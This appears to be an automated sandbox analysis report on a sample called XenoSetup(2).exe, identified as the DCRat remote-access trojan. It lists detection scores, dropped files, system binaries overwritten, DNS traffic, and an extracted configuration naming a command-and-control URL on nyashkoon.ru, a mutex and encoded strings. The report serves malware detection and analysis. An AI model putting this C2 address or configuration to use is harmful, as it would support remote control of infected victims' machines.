                      Source: 0000000F.00000002.2633412439.0000000013BEA000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"C2 url": "http://804052cm.nyashkoon.ru/imagelineGeoTest", "MUTEX": "DCR_MUTEX-SbjZ9dzDfzVchxMwaR3O", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
                      Source: C:\Users\user\Desktop\Aqnqislq.logReversingLabs: Detection: 70%
                      Source: C:\Users\user\Desktop\BFVQSOun.logReversingLabs: Detection: 50%
                      Source: C:\Users\user\Desktop\BOtQCANk.logReversingLabs: Detection: 29%
                      Source: C:\Users\user\Desktop\ESyrPCdJ.logReversingLabs: Detection: 50%
                      Source: C:\Users\user\Desktop\GGCzAPYH.logReversingLabs: Detection: 20%
                      Source: C:\Users\user\Desktop\ItmQLqVf.logReversingLabs: Detection: 50%
                      Source: C:\Users\user\Desktop\KZGGSUqY.logReversingLabs: Detection: 25%
                      Source: C:\Users\user\Desktop\LxMgmcSS.logReversingLabs: Detection: 37%
                      Source: C:\Users\user\Desktop\MPdHuBxA.logReversingLabs: Detection: 25%
                      Source: C:\Users\user\Desktop\NoWOUMSl.logReversingLabs: Detection: 37%
                      Source: C:\Users\user\Desktop\NpzpwslB.logReversingLabs: Detection: 25%
                      Source: C:\Users\user\Desktop\WKMEYgAB.logReversingLabs: Detection: 25%
                      Source: C:\Users\user\Desktop\ZSKNtyuw.logReversingLabs: Detection: 25%
                      Source: C:\Users\user\Desktop\dQveIBvX.logReversingLabs: Detection: 70%
                      Source: C:\Users\user\Desktop\eLGexRyL.logReversingLabs: Detection: 25%
                      Source: C:\Users\user\Desktop\gQJUAkON.logReversingLabs: Detection: 50%
                      Source: C:\Users\user\Desktop\kEjDZxDz.logReversingLabs: Detection: 20%
                      Source: C:\Users\user\Desktop\remTNUPL.logReversingLabs: Detection: 20%
                      Source: C:\Users\user\Desktop\tBjJkMRH.logReversingLabs: Detection: 20%
                      Source: C:\Users\user\Desktop\uOpJsBHp.logReversingLabs: Detection: 20%
                      Source: C:\Users\user\Desktop\vMsrqipz.logReversingLabs: Detection: 20%
                      Source: C:\Users\user\Desktop\vcvJAqxW.logReversingLabs: Detection: 29%
                      Source: XenoSetup(2).exe.bin.exeReversingLabs: Detection: 55%
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                      Source: C:\Users\user\Desktop\GyShWgyC.logJoe Sandbox ML: detected
                      Source: C:\Users\user\Desktop\GGCzAPYH.logJoe Sandbox ML: detected
                      Source: C:\Users\user\Desktop\IlCyhHua.logJoe Sandbox ML: detected
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\Desktop\Aqnqislq.logJoe Sandbox ML: detected
                      Source: C:\Users\user\Desktop\ARRIhAyp.logJoe Sandbox ML: detected
                      Source: C:\Users\user\Desktop\FSpHSmDL.logJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeJoe Sandbox ML: detected
                      Source: XenoSetup(2).exe.bin.exeJoe Sandbox ML: detected
                      Source: 0000000F.00000002.2633412439.0000000013BEA000.00000004.00000800.00020000.00000000.sdmpString decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-SbjZ9dzDfzVchxMwaR3O","0","","","5","2","WyIyIiwiQzpcXFdpbmRvd3NcXFN5c3RlbTMyTG9jYWwvIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVXB0V1ZkNGVscFRTWE5KYW1kcFQybEtNR051Vm14SmFYZHBUMU5KTmtsdVVubGtWMVZwVEVOSmVFMURTVFpKYmxKNVpGZFZhVXhEU1hoTlUwazJTVzVTZVdSWFZXbE1RMGw0VFdsSk5rbHVVbmxrVjFWcFRFTkplRTE1U1RaSmJsSjVaRmRWYVV4RFNYaE9RMGsyU1c1U2VXUlhWV2xtVVQwOUlsMD0iXQ=="]
                      Source: 0000000F.00000002.2633412439.0000000013BEA000.00000004.00000800.00020000.00000000.sdmpString decryptor: [["http://804052cm.nyashkoon.ru/","imagelineGeoTest"]]
                      Source: XenoSetup(2).exe.bin.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\XenoSetup(2).exe.bin.exe.logJump to behavior
                      Source: XenoSetup(2).exe.bin.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: XenoSetup(1).exe, 00000006.00000000.2342774589.0000000001013000.00000002.00000001.01000000.00000008.sdmp, XenoSetup(1).exe, 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmp, XenoSetup(1).exe, 0000000A.00000000.2466239028.0000000001013000.00000002.00000001.01000000.00000008.sdmp, XenoSetup(1).exe, 0000000A.00000002.2471884148.0000000001013000.00000002.00000001.01000000.00000008.sdmp, XenoSetup(1).exe, 00000010.00000000.2546623626.0000000001013000.00000002.00000001.01000000.00000008.sdmp, XenoSetup(1).exe, 00000010.00000002.2557207188.0000000001013000.00000002.00000001.01000000.00000008.sdmp
                      Source: Binary string: D:\a\_work\1\s\artifacts\obj\win-x64.Release\corehost\apphost\standalone\apphost.pdb source: XenoSetup(2).exe.bin.exe, 00000000.00000002.2351062899.0000000013118000.00000004.00000800.00020000.00000000.sdmp, Xeno.exe, 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmp, Xeno.exe, 00000007.00000000.2346195211.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmp, Xeno.exe.0.dr
                      Source: Binary string: D:\a\_work\1\s\artifacts\obj\win-x64.Release\corehost\apphost\standalone\apphost.pdbmmmGCTL source: XenoSetup(2).exe.bin.exe, 00000000.00000002.2351062899.0000000013118000.00000004.00000800.00020000.00000000.sdmp, Xeno.exe, 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmp, Xeno.exe, 00000007.00000000.2346195211.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmp, Xeno.exe.0.dr
                      Source: Binary string: :C:\Users\user\AppData\Local\Temp\xze5z45r\xze5z45r.pdb source: DriverbrokerCrtDhcp.exe, 0000000F.00000002.2614383280.0000000003924000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: :C:\Users\user\AppData\Local\Temp\3tshlj5d\3tshlj5d.pdb source: DriverbrokerCrtDhcp.exe, 0000000F.00000002.2614383280.0000000003924000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: :C:\Users\user\AppData\Local\Temp\w5cymjn5\w5cymjn5.pdb source: DriverbrokerCrtDhcp.exe, 0000000F.00000002.2614383280.0000000003924000.00000004.00000800.00020000.00000000.sdmp

                      Spreading

                      barindex
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exe
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeCode function: 6_2_00FEA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,6_2_00FEA69B
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeCode function: 6_2_0100B348 FindFirstFileExA,6_2_0100B348
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeCode function: 6_2_00FFC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,6_2_00FFC220
                      Source: C:\Users\user\AppData\Local\Temp\Xeno.exeCode function: 7_2_00007FF68D5ECD20 GetFileAttributesExW,GetFullPathNameW,GetFullPathNameW,_invalid_parameter_noinfo_noreturn,GetFileAttributesExW,_invalid_parameter_noinfo_noreturn,Concurrency::cancel_current_task,FindFirstFileExW,FindNextFileW,FindClose,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,Concurrency::cancel_current_task,Concurrency::cancel_current_task,7_2_00007FF68D5ECD20
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeFile opened: C:\Users\user\AppDataJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeFile opened: C:\Users\userJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior

                      Networking

                      barindex
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                      Source: unknownDNS traffic detected: query: 804052cm.nyashkoon.ru replaycode: Name error (3)
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficDNS traffic detected: DNS query: 804052cm.nyashkoon.ru
                      Source: NZdXlPbVdUubKXQ.exe, 00000020.00000002.2767145837.000000000356D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://804052cm.nyashkoon.ru
                      Source: NZdXlPbVdUubKXQ.exe, 00000020.00000002.2767145837.000000000356D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://804052cm.nyashkoon.ru/
                      Source: NZdXlPbVdUubKXQ.exe, 00000020.00000002.2767145837.000000000356D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://804052cm.nyashkoon.ru/imagelineGeoTest.php
                      Source: powershell.exe, 00000002.00000002.2325222503.000001A1F8E66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
                      Source: powershell.exe, 00000002.00000002.2317624286.000001A1F080E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: powershell.exe, 00000002.00000002.2286713568.000001A1E09C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: powershell.exe, 00000002.00000002.2286713568.000001A1E09C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: powershell.exe, 00000002.00000002.2286713568.000001A1E07A1000.00000004.00000800.00020000.00000000.sdmp, DriverbrokerCrtDhcp.exe, 0000000F.00000002.2614383280.0000000003924000.00000004.00000800.00020000.00000000.sdmp, NZdXlPbVdUubKXQ.exe, 00000020.00000002.2767145837.000000000356D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 00000002.00000002.2286713568.000001A1E09C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                      Source: powershell.exe, 00000002.00000002.2286713568.000001A1E09C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: XenoSetup(2).exe.bin.exe, 00000000.00000002.2351062899.0000000013118000.00000004.00000800.00020000.00000000.sdmp, Xeno.exe, Xeno.exe, 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmp, Xeno.exe, 00000007.00000000.2346195211.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmp, Xeno.exe.0.drString found in binary or memory: https://aka.ms/dotnet-core-applaunch?
                      Source: XenoSetup(2).exe.bin.exe, 00000000.00000002.2351062899.0000000013118000.00000004.00000800.00020000.00000000.sdmp, Xeno.exe, 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmp, Xeno.exe, 00000007.00000000.2346195211.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmp, Xeno.exe.0.drString found in binary or memory: https://aka.ms/dotnet-core-applaunch?Architecture:
                      Source: Xeno.exe, Xeno.exe, 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmp, Xeno.exe, 00000007.00000000.2346195211.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmp, Xeno.exe.0.drString found in binary or memory: https://aka.ms/dotnet/app-launch-failed
                      Source: Xeno.exeString found in binary or memory: https://aka.ms/dotnet/app-launch-failedDownload
                      Source: Xeno.exeString found in binary or memory: https://aka.ms/dotnet/app-launch-failedWould
                      Source: powershell.exe, 00000002.00000002.2286713568.000001A1E07A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                      Source: powershell.exe, 00000002.00000002.2317624286.000001A1F080E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000002.00000002.2317624286.000001A1F080E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000002.00000002.2317624286.000001A1F080E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: powershell.exe, 00000002.00000002.2286713568.000001A1E09C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: Xeno.exeString found in binary or memory: https://github.com/Riz-ve/Xeno
                      Source: Xeno.exe, 00000007.00000000.2346254020.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmp, Xeno.exe.0.drString found in binary or memory: https://github.com/Riz-ve/Xeno.
                      Source: powershell.exe, 00000002.00000002.2317624286.000001A1F080E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

                      System Summary

                      barindex
                      Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeCode function: 6_2_00FE6FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,6_2_00FE6FAA
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeFile created: C:\Windows\System32LocalJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeFile created: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeFile created: C:\Windows\System32Local\d4d0c4061cb618Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\CSC3568A44F8D2D461ABD894E9C160B8C.TMP
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\SecurityHealthSystray.exe
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile deleted: C:\Windows\System32\CSC3568A44F8D2D461ABD894E9C160B8C.TMP
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeCode function: 0_2_00007FFD348B0A210_2_00007FFD348B0A21
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD34898E052_2_00007FFD34898E05
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD34899EF32_2_00007FFD34899EF3
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD348927852_2_00007FFD34892785
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeCode function: 6_2_00FE848E6_2_00FE848E
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeCode function: 6_2_00FE40FE6_2_00FE40FE
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeCode function: 6_2_00FF00B76_2_00FF00B7
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeCode function: 6_2_00FF40886_2_00FF4088
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeCode function: 6_2_010051C96_2_010051C9
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeCode function: 6_2_00FF71536_2_00FF7153
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeCode function: 6_2_00FE32F76_2_00FE32F7
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeCode function: 6_2_00FF62CA6_2_00FF62CA
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeCode function: 6_2_00FF43BF6_2_00FF43BF
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeCode function: 6_2_00FEF4616_2_00FEF461
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeCode function: 6_2_00FEC4266_2_00FEC426
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeCode function: 6_2_0100D4406_2_0100D440
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeCode function: 6_2_00FF77EF6_2_00FF77EF
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeCode function: 6_2_00FE286B6_2_00FE286B
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeCode function: 6_2_010119F46_2_010119F4
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeCode function: 6_2_00FEE9B76_2_00FEE9B7
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeCode function: 6_2_0100D8EE6_2_0100D8EE
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeCode function: 6_2_00FF6CDC6_2_00FF6CDC
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeCode function: 6_2_01004F9A6_2_01004F9A
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeCode function: 6_2_00FF3E0B6_2_00FF3E0B
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeCode function: 6_2_00FEEFE26_2_00FEEFE2
                      Source: C:\Users\user\AppData\Local\Temp\Xeno.exeCode function: 7_2_00007FF68D5E44E07_2_00007FF68D5E44E0
                      Source: C:\Users\user\AppData\Local\Temp\Xeno.exeCode function: 7_2_00007FF68D5EF0107_2_00007FF68D5EF010
                      Source: C:\Users\user\AppData\Local\Temp\Xeno.exeCode function: 7_2_00007FF68D5E72907_2_00007FF68D5E7290
                      Source: C:\Users\user\AppData\Local\Temp\Xeno.exeCode function: 7_2_00007FF68D5EAA707_2_00007FF68D5EAA70
                      Source: C:\Users\user\AppData\Local\Temp\Xeno.exeCode function: 7_2_00007FF68D5EE6507_2_00007FF68D5EE650
                      Source: C:\Users\user\AppData\Local\Temp\Xeno.exeCode function: 7_2_00007FF68D5E2DB07_2_00007FF68D5E2DB0
                      Source: C:\Users\user\AppData\Local\Temp\Xeno.exeCode function: 7_2_00007FF68D5EBD807_2_00007FF68D5EBD80
                      Source: C:\Users\user\AppData\Local\Temp\Xeno.exeCode function: 7_2_00007FF68D5ECD207_2_00007FF68D5ECD20
                      Source: C:\Users\user\AppData\Local\Temp\Xeno.exeCode function: 7_2_00007FF68D5E30E07_2_00007FF68D5E30E0
                      Source: C:\Users\user\AppData\Local\Temp\Xeno.exeCode function: 7_2_00007FF68D5EC8107_2_00007FF68D5EC810
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeCode function: 15_2_00007FFD34891A7D15_2_00007FFD34891A7D
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeCode function: 15_2_00007FFD3489175515_2_00007FFD34891755
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeCode function: 15_2_00007FFD34C6610015_2_00007FFD34C66100
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeCode function: 15_2_00007FFD34C5462815_2_00007FFD34C54628
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeCode function: 15_2_00007FFD34C52DF215_2_00007FFD34C52DF2
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeCode function: 15_2_00007FFD34C5C5F015_2_00007FFD34C5C5F0
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeCode function: 15_2_00007FFD34C5C5D115_2_00007FFD34C5C5D1
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeCode function: 15_2_00007FFD34C55BD315_2_00007FFD34C55BD3
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeCode function: 15_2_00007FFD34FF505B15_2_00007FFD34FF505B
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeCode function: 15_2_00007FFD34FF4F5515_2_00007FFD34FF4F55
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeCode function: 31_2_00007FFD348B1A7D31_2_00007FFD348B1A7D
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeCode function: 31_2_00007FFD348B175531_2_00007FFD348B1755
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeCode function: 31_2_00007FFD348DFA6531_2_00007FFD348DFA65
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeCode function: 32_2_00007FFD348B03FA32_2_00007FFD348B03FA
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeCode function: 32_2_00007FFD348CFA6532_2_00007FFD348CFA65
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeCode function: 32_2_00007FFD348A1A7D32_2_00007FFD348A1A7D
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeCode function: 32_2_00007FFD348A175532_2_00007FFD348A1755
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeCode function: 32_2_00007FFD34C640F232_2_00007FFD34C640F2
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeCode function: 32_2_00007FFD34C6462832_2_00007FFD34C64628
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeCode function: 32_2_00007FFD34C62DF232_2_00007FFD34C62DF2
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeCode function: 32_2_00007FFD34C6C5F032_2_00007FFD34C6C5F0
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeCode function: 32_2_00007FFD34C7E19E32_2_00007FFD34C7E19E
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeCode function: 32_2_00007FFD34C6C5D132_2_00007FFD34C6C5D1
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeCode function: 32_2_00007FFD34C6CAF432_2_00007FFD34C6CAF4
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeCode function: 32_2_00007FFD34C6C2FC32_2_00007FFD34C6C2FC
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeCode function: 32_2_00007FFD34C6C2F832_2_00007FFD34C6C2F8
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeCode function: 32_2_00007FFD34C6C31032_2_00007FFD34C6C310
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeCode function: 32_2_00007FFD34C6C43532_2_00007FFD34C6C435
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeCode function: 32_2_00007FFD34C65BD432_2_00007FFD34C65BD4
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeCode function: 32_2_00007FFD3500505B32_2_00007FFD3500505B
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeCode function: 32_2_00007FFD35004F5532_2_00007FFD35004F55
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeCode function: 40_2_00007FFD348CFA6540_2_00007FFD348CFA65
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeCode function: 40_2_00007FFD348A1A7D40_2_00007FFD348A1A7D
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeCode function: 40_2_00007FFD348A175540_2_00007FFD348A1755
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeCode function: 41_2_00007FFD34891A7D41_2_00007FFD34891A7D
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeCode function: 41_2_00007FFD3489175541_2_00007FFD34891755
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeCode function: 41_2_00007FFD348BFA6541_2_00007FFD348BFA65
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeCode function: 45_2_00007FFD348B1A7D45_2_00007FFD348B1A7D
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeCode function: 45_2_00007FFD348B175545_2_00007FFD348B1755
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeCode function: 47_2_00007FFD348A1A7D47_2_00007FFD348A1A7D
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeCode function: 47_2_00007FFD348A175547_2_00007FFD348A1755
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeCode function: 49_2_00007FFD348A1A7D49_2_00007FFD348A1A7D
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeCode function: 49_2_00007FFD348A175549_2_00007FFD348A1755
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeCode function: 49_2_00007FFD348CFA6549_2_00007FFD348CFA65
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeCode function: 52_2_00007FFD348DFA6552_2_00007FFD348DFA65
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeCode function: 52_2_00007FFD348B1A7D52_2_00007FFD348B1A7D
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeCode function: 52_2_00007FFD348B175552_2_00007FFD348B1755
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\ARRIhAyp.log 32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeCode function: String function: 00FFEB78 appears 39 times
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeCode function: String function: 00FFF5F0 appears 31 times
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeCode function: String function: 00FFEC50 appears 56 times
                      Source: tBjJkMRH.log.15.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: KZGGSUqY.log.15.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: Aqnqislq.log.15.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: bGOWfMqu.log.15.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: ItmQLqVf.log.15.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: pczkrlLQ.log.15.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: WKMEYgAB.log.15.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
